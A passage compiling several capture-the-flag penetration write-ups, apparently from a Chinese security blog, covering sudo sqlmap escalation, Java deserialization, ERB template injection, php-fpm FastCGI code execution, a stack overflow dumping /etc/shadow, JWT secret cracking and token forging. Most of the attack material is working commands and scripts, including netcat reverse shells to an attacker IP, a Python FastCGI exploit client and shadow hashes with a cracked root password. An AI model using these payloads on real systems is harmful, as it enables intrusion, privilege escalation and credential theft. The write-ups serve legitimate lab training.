/usr/libexec/polkit-agent-helper-1
andeli@New:~$ sudo -l
Matching Defaults entries for andeli on New:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User andeli may run the following commands on New:
(ALL) NOPASSWD: /usr/bin/sqlmap
sqlmap can be run as root.
andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
___
__H__
___ ___[)]_____ ___ ___ {1.5.2#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:43:51 /2025-07-01/
[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
#
-
yulian
https://dirtycow.cn/300.html
2025-06-30T00:20:00+08:00
Web foothold
The site offers a simulated terminal for executing commands. It shows the file /opt/code/test.c, which uses a pseudo-random generator; running the code yields three numbers. Port-knocking with those three numbers opens port 8080.
On port 8080, password brute-forcing gives admin/123457. Directory scanning finds the endpoint /download; fuzzing its parameter name turns up file, which allows arbitrary file read. Reading /proc/self/maps to inspect the process memory map reveals /app/javaserver-0.0.1-SNAPSHOT.jar. Read the jar through the same endpoint and decompile it: it has a deserialization endpoint. Hit it directly with a CommonsCollections chain, using ysoserial to generate a reverse-shell payload. Send the payload with the cookie attached to get a shell.
Internal lateral movement
Upload frp, set up a SOCKS proxy, and scan the internal network with fscan and similar tools. This finds the internal host 172.17.0.2 with ports 80 and 22 open. Port 80 serves a page explaining brute-force attacks, with a comment at the very bottom reading 500-worst-passwords; that is one of the SecLists wordlists, so use it to brute-force root@172.17.0.2: root/mountain.
SSH in. /usr/bin contains a suspicious file, userLogin. Analysing it in IDA shows a file-encryption function; stepping into it, it is standard XTEA. The key and the output file are found there: because the key and the name of the file being read are both constants, IDA's analysis merged the two values into one. An XTEA key is 16 bytes long and is split into 4 words for encryption: key-for-user-ldz is the key and id_ed25519 is the file being read, clearly a private key. Write a script to decrypt output.enc, which is found under /etc/; extract it and decrypt:

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 8
#define ROUNDS 64

/* The 16-byte key IDA showed next to the file name, and the file names used here. */
const char FIXED_KEY_STR[16] = "key-for-user-ldz";
const char *INPUT_FILE = "output.enc";
const char *OUTPUT_FILE = "decrypted.txt";

/* Standard XTEA decryption of one 64-bit block (the encrypt loop run backwards). */
void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS;
    for (int i = 0; i < ROUNDS; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0; v[1] = v1;
}

/* Split the 16-byte key into the 4 uint32 words XTEA uses (little-endian). */
void key_from_fixed_string(uint32_t key[4]) {
    for (int i = 0; i < 4; ++i) {
        key[i] = ((uint32_t)FIXED_KEY_STR[i*4]) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 1] << 8) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 2] << 16) |
                 ((uint32_t)FIXED_KEY_STR[i*4 + 3] << 24);
    }
}

/* Decrypt INPUT_FILE block by block; a trailing partial block (< 8 bytes) is ignored. */
void decrypt_file() {
    FILE *fin = fopen(INPUT_FILE, "rb");
    FILE *fout = fopen(OUTPUT_FILE, "wb");
    if (!fin || !fout) {
        perror("文件打开失败");
        exit(1);
    }
    uint32_t key[4];
    key_from_fixed_string(key);
    uint8_t buffer[BLOCK_SIZE];
    size_t read_size;
    while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) {
        uint32_t block[2];
        memcpy(block, buffer, BLOCK_SIZE);
        xtea_decrypt(block, key);
        fwrite(block, 1, BLOCK_SIZE, fout);
    }
    fclose(fin);
    fclose(fout);
    printf("解密完成:%s → %s\n", INPUT_FILE, OUTPUT_FILE);
}

int main() {
    decrypt_file();
    return 0;
}
Inspecting the decrypted file: it is a private key. Set its permissions to 600; the decryption key's name shows it belongs to user ldz, so log in as that user.
Privilege escalation
localhost:~$ find / -perm -4000 2>/dev/null
/opt/vuln
/bin/bbsuid
Among the SUID binaries there is vuln; analysing it in IDA shows that setting flag=1 makes it call secret(), which reads /etc/shadow. This is clearly a stack overflow that overwrites the value of flag and bypasses the check. Payload:
localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln
root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20205:0:99999:7:::
chrony:!:20205:0:99999:7:::
ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7:::
nginx:!:20263:0:99999:7:::
Shadow read successfully; cracking the hash gives the root password:
┌──(root㉿kali)-[~]
└─# john --format=sha512crypt --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
┌──(root㉿kali)-[~]
└─# john hash --show
root:yulianateamo:20263:0:::::
1 password hash cracked, 0 left
┌──(root㉿kali)-[~]
└─# ssh root@10.20.73.10
root@10.20.73.10's password:
localhost:~#
localhost:~#
localhost:~# ls
root.txt
localhost:~# cat root.txt
flag{98ecb90d5dcef41e1bd18f47697f287a}
localhost:~#
-
hackingtoys
https://dirtycow.cn/256.html
2024-09-16T21:30:00+08:00
Information gathering
Port scan with nmap:
nmap -sS 10.20.73.121 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
MAC Address: 00:0C:29:82:76:43 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
Ports 22 and 3000 are open; run nmap -sV for detailed service detection:
┌──(root㉿kali)-[~]
└─# nmap -sV 10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds
The fingerprint shows SSL, so try accessing the service over https.
Vulnerability discovery
Web foothold
Look at the five links on the page: all five are hacking tools. Next, test the input box below them. Entering arbitrary content gives the message "Product does not exist", and that string turns out to be the value of the message parameter: setting message to 123 changes the displayed text to 123. There is an obvious XSS here, but it is of no use. The site's programming language is Ruby.
Ruby/ERB SSTI
After some searching: this is an ERB server-side template injection, and templates of the form <%= (ruby code) %> execute commands. Test it by passing <%= 7*7 %> URL-encoded; the output is 49, confirming the vulnerability.
Try for a reverse shell. The reverse-shell template used:
<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>
Python is available, so spawn a pty with it:
python3 -c "import pty;pty.spawn('/bin/bash')"
Privilege escalation
Ports 80 and 9000 are listening on localhost; forward both out:
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 &
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 &
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp
ss -nltp
State Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0 5 0.0.0.0:8080 0.0.0.0:* users:(("socat",pid=1282,fd=5))
LISTEN 0 511 127.0.0.1:80 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:9000 0.0.0.0:*
LISTEN 0 1024 0.0.0.0:3000 0.0.0.0:* users:(("ruby",pid=593,fd=7))
LISTEN 0 5 0.0.0.0:9001 0.0.0.0:* users:(("socat",pid=1281,fd=5))
LISTEN 0 128 [::]:22 [::]:*
Visit the forwarded port 80. After a long time testing it no vulnerability turned up, so the target moved to port 9000. The process list on the box shows php-fpm, whose default port is exactly 9000.
https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi
A script found online gives direct command execution; changing the port and path is enough to use it as-is:

#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path
HOST=$1
# -w0: no line wrapping, so the data: URI below stays on one line
B64=$(echo "$PAYLOAD"|base64 -w0)
for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    # PHP_VALUE is honoured by php-fpm; auto_prepend_file pulls the payload in via data://
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
    cat $OUTPUT
done

The command runs as the dodi user, so get a reverse shell directly to escalate to that user.
Escalating to dodi
Change the command that is executed:

#!/bin/bash
PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path
HOST=$1
B64=$(echo "$PAYLOAD"|base64 -w0)
for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT
    cat $OUTPUT
done

Escalating to root
sudo -l shows this user may run the script /usr/local/bin/rvm_rails.sh with sudo. Run the script:
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
Usage:
rails COMMAND [options]
You must specify a command:
new Create a new Rails application. "rails new my_app" creates a
new application called MyApp in "./my_app"
plugin new Create a new Rails railtie or engine
All commands can be run with -h (or --help) for more information.
Inside a Rails application directory, some common commands are:
console Start the Rails console
server Start the Rails server
test Run tests except system tests

So the wrapper runs rails. Rails is a web application framework written in Ruby. Now analyze the wrapper script itself:

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

All the script does is set up the RVM environment and exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails, so whatever that file contains runs as root under sudo. The file's permissions (screenshot) let the rvm group modify it; check who is in that group:

dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
rvm:x:1002:lidia,root

lidia is a member of rvm and can therefore overwrite the file. Write /bin/bash into it as lidia (the file then has no shebang, so the exec falls back to interpreting it as a shell script, which launches bash as root), then run the sudo command again as dodi. Note that this destroys the rails binstub; copy it aside first if it has to be restored afterwards.

lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)
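Back to the php-fpm step of this box: the cgi-fcgi one-liner hides what actually goes over the wire. Below is the same attack as an added Python FastCGI client (my code, not the author's script and not the hacktricks page), which builds the records itself so that the per-request ini override is visible, and can be pointed at the socat forward on port 9001. It uses the php://input variant (the PHP code travels in the request body) instead of the data:// stream, sends allow_url_include as PHP_ADMIN_VALUE because that directive is PHP_INI_SYSTEM on current PHP, and assumes the existing script path /var/www/html/index.php from the writeup; port and path are assumptions to adjust per target.

```python
import socket
import struct
from typing import List, Tuple

# Record types and the responder role, from the FastCGI specification.
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT = 1, 4, 5, 6
FCGI_RESPONDER = 1


def fcgi_record(rtype: int, content: bytes, request_id: int = 1) -> bytes:
    """One record: version, type, request id, content length, padding length, reserved byte, then content + padding."""
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", 1, rtype, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def encode_nv(name: bytes, value: bytes) -> bytes:
    """Name-value pair: each length is 1 byte below 128, otherwise 4 bytes big-endian with the top bit set."""
    out = b""
    for n in (len(name), len(value)):
        out += struct.pack(">B", n) if n < 128 else struct.pack(">I", n | 0x80000000)
    return out + name + value


def build_request(script_path: str, php_code: str, request_id: int = 1) -> bytes:
    """BEGIN_REQUEST, PARAMS (closed by an empty PARAMS), STDIN with the PHP code (closed by an empty STDIN)."""
    body = php_code.encode()
    params = {
        "SCRIPT_FILENAME": script_path,  # must exist on the target, like FILENAMES in the bash script
        "SCRIPT_NAME": script_path,
        "REQUEST_METHOD": "POST",
        "CONTENT_LENGTH": str(len(body)),
        # allow_url_include is PHP_INI_SYSTEM, so it has to arrive as PHP_ADMIN_VALUE; in PHP_VALUE it is ignored.
        "PHP_ADMIN_VALUE": "allow_url_include = On",
        # Prepend the request body itself as PHP before script_path runs.
        "PHP_VALUE": "auto_prepend_file = php://input",
    }
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags (0: php-fpm closes the socket after replying), reserved
    nv = b"".join(encode_nv(k.encode(), v.encode()) for k, v in params.items())
    return (fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
            + fcgi_record(FCGI_PARAMS, nv, request_id)
            + fcgi_record(FCGI_PARAMS, b"", request_id)
            + fcgi_record(FCGI_STDIN, body, request_id)
            + fcgi_record(FCGI_STDIN, b"", request_id))


def parse_records(data: bytes) -> List[Tuple[int, bytes]]:
    """Split a FastCGI byte stream into (type, content) tuples; used on php-fpm's reply."""
    records, off = [], 0
    while off + 8 <= len(data):
        _ver, rtype, _rid, clen, plen, _res = struct.unpack(">BBHHBB", data[off:off + 8])
        records.append((rtype, data[off + 8:off + 8 + clen]))
        off += 8 + clen + plen
    return records


def run_php(host: str, port: int, script_path: str, php_code: str) -> bytes:
    """Send the request to the exposed php-fpm (e.g. the socat forward on 9001) and return its STDOUT stream.
    Network call; not exercised by the test."""
    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(build_request(script_path, php_code))
        reply = b""
        while True:
            chunk = sock.recv(65536)
            if not chunk:
                break
            reply += chunk
    return b"".join(content for rtype, content in parse_records(reply) if rtype == FCGI_STDOUT)


if __name__ == "__main__":
    import sys
    # Usage: python3 fcgi_client.py <target host>; 'exit;' keeps index.php itself from running afterwards.
    out = run_php(sys.argv[1], 9001, "/var/www/html/index.php", "<?php system('id'); exit; ?>")
    print(out.decode(errors="replace"))
```

The reply is a FastCGI stream too, so parse_records is applied to it and only the STDOUT records are returned; the HTTP-style headers php-fpm prints before the body stay in that stream. The defensive reading of the same code: anything that can open a TCP connection to a php-fpm port can do this, so php-fpm should listen on a unix socket or be firewalled to the web server, and the exposed 127.0.0.1:9000 on this box was only one socat away from the attacker.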
-
aurora渗透笔记
https://dirtycow.cn/77.html
2023-10-21T21:41:00+08:00
1. Information gathering

1.1. Target discovery

Import the VM into VirtualBox and boot it; the target's IP is 10.177.246.54.

1.2. Port scanning

Scan all ports of the target with nmap:

┌──(root㉿kali)-[~]
└─# nmap -sS -sV 10.177.246.54 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 06:41 EDT
Nmap scan report for 10.177.246.54
Host is up (0.00052s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
3000/tcp open http Node.js Express framework
MAC Address: 08:00:27:73:80:C0 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds

Ports 22 and 3000 are open; 3000 is a Node.js (Express) backend.

2. Vulnerability discovery

2.1. Port 3000

The root path answers "Cannot GET /", Express's default 404 for a path with no handler. Switching the method to POST with HackBar gives "Cannot POST /", so there is no handler for the root at all.

2.2. Directory brute-forcing

Brute-force paths with ffuf:

┌──(root㉿kali)-[~]
└─# ffuf -w /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.177.246.54:3000/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.177.246.54:3000/FUZZ
:: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
:: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:40] :: Errors: 0 ::

Nothing came back with GET: every path returned 404, which the default matcher hides. Try POST, this time matching all status codes and filtering only the 404s, since an API that only has POST routes answers 404 to GET on them:

┌──(root㉿kali)-[~]
└─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -X POST -fc 404 -mc all -u http://10.177.246.54:3000/FUZZ
________________________________________________
:: Method : POST
:: URL : http://10.177.246.54:3000/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: all
:: Filter : Response status: 404
________________________________________________
[Status: 401, Size: 22, Words: 2, Lines: 1, Duration: 27ms]
* FUZZ: login
[Status: 400, Size: 29, Words: 6, Lines: 1, Duration: 25ms]
* FUZZ: register
[Status: 401, Size: 12, Words: 1, Lines: 1, Duration: 7ms]
* FUZZ: execute
:: Progress: [207643/207643] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:38] :: Errors: 0 ::

Three paths respond: login, register and execute. Check each with curl:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/login
Identifiants invalides
┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register
The "role" field is not valid
┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute
Unauthorized

/login answers "Identifiants invalides" (French for invalid credentials), /register complains that the role field is not valid, and /execute wants authorization.

2.3. Brute-forcing the register role field

The register endpoint validates a role value; fuzz it with a JSON body:

┌──(root㉿kali)-[~]
└─# ffuf -w SecLists-master/Discovery/Web-Content/api/objects.txt -X POST -u http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"FUZZ"}'
________________________________________________
:: Method : POST
:: URL : http://10.177.246.54:3000/register
:: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt
:: Header : Content-Type: application/json
:: Data : {"role":"FUZZ"}
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________
[Status: 401, Size: 16, Words: 3, Lines: 1, Duration: 30ms]
* FUZZ: admin
[Status: 500, Size: 32, Words: 5, Lines: 1, Duration: 41ms]
* FUZZ: user
:: Progress: [3132/3132] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:02] :: Errors: 0 ::
Two role values stand out: admin (401) and user (500). Test both with curl:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"admin"}'
Not authorized !

Registering with role admin is refused. Try user:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user"}'
Column 'username' cannot be null

The response is a raw MySQL error: the username column cannot be null. That confirms registration writes straight to a database table and that database errors are returned unfiltered, which leaks the column names one by one. Add username:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user"}'
Column 'password' cannot be null

Now the password column cannot be null. Add password:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}'
Registration OK

Registration succeeded.

2.4. Login

Log in with curl:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/login -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}'
{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M"}

Login returns a JWT access token.

3. Exploitation

3.1. Executing commands with the returned token

Guessing that the command field is called cmd:

┌──(root㉿kali)-[~]
└─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M" -H "Content-Type: application/json" -d '{"cmd":"id"}'
Not authorized

Still unauthorized; presumably only the admin role may execute commands.

3.2. Forging an admin token

The header decodes to {"alg":"HS256","typ":"JWT"}, so the token is signed with a plain HMAC secret: the payload can be edited freely on jwt.io, but a signature the server accepts needs that secret. Paste the token into jwt.io, then crack the secret offline with john:

┌──(root㉿kali)-[~]
└─# echo eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M > user.hash
┌──(root㉿kali)-[~]
└─# john -w=rockyou.txt user.hash
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
nopassword (?)
1g 0:00:00:00 DONE (2023-05-10 08:20) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

The secret is nopassword. On jwt.io, set both username and role to admin and enter the secret in the signature box; the re-signed token is the forged admin token. Copy it and try the command again:
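The john run and the jwt.io re-signing, done by hand as an added Python example (my code, not the author's tooling): it shows why a guessable HS256 secret turns the server's authorization check into a formality the client controls. The two tokens are the ones from this writeup (the /login token for user:user, and the admin token used in the curl request that follows); the five-word wordlist standing in for rockyou.txt is constructed.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: bytes) -> str:
    """Compact JWT: b64url(header).b64url(payload).b64url(HMAC-SHA256(secret, first two parts))."""
    parts = [b64url_encode(json.dumps(p, separators=(",", ":")).encode()) for p in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


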